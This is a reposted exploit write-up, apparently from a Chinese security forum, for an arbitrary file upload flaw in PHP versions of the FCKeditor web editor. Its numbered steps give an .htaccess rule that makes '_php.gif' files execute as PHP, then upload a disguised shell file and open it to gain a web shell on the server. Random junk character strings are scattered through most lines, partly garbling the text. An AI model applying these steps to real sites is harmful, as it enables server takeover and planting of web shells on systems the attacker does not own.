FCKeditor所有php版本Upload上传漏洞
; H1 ~9 t% h; \* D* w! s4 ]- O+ z作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07; S) ^1 m; u+ U- a+ B
减小字体 增大字体
: ~+ P0 Z+ E: b" e" U9 s; ?[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability/ A! {2 q# ?8 @. C- q
[+] Date: 2011% j9 C' z2 b8 f% Q/ l2 v- W
[+] Author : sinesafe.cn
+ q+ o# W$ A/ N- k0 x[+] Website : WwW.sinesafe.cn; r" n! G7 y5 h' z% i$ J
———————————————————
. }. g' v% l8 s- h4 q" g: |: c6 _1.create a htaccess file:
" z* F2 g& R8 C# U- W" ?8 s/ E/ Ncode:
# i2 O3 B g( F: J" e/ v" {<FilesMatch “_php.gif”> l7 l7 p: J" k; Y' Y+ Y% J
SetHandler application/x-httpd-php
" t1 _! O* h+ H7 r5 c8 _5 p" D</FilesMatch>6 @; v( I9 V! R2 M) K/ _
. |7 F' V5 _2 z
2.Now upload this htaccess with FCKeditor.9 Z7 z& C+ ]0 O% n, n, H
2 K, Y7 D8 d( X/ d
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html% b) P" i( K, h4 A$ U
4 ^: \1 D# f# {) T+ \2 shttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
% Y. o. C3 N$ c
/ T3 l; h% ^2 [0 j———————————————————————————————-
0 R. a& ]" s) S5 m4 X3.Now upload shell.php.gif with FCKeditor.
! Z/ t4 Q( Q" s5 q; \) _7 B, ~4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
% C e$ H1 K4 n5.http://www.sinesafe.cn/anything/shell_php.gif" t6 B. ~- D v- R2 l' @% g+ }2 w
6.Now shell is available from server. |
; H' T( p5 W3 p$ g# {
! ?# k6 [8 ~; x9 [4 a# ?2 F7 l: |1 N& t2 {7 ?) R L, @" T
|
发表于 2013-10-27 17:25:21
收藏
支持
反对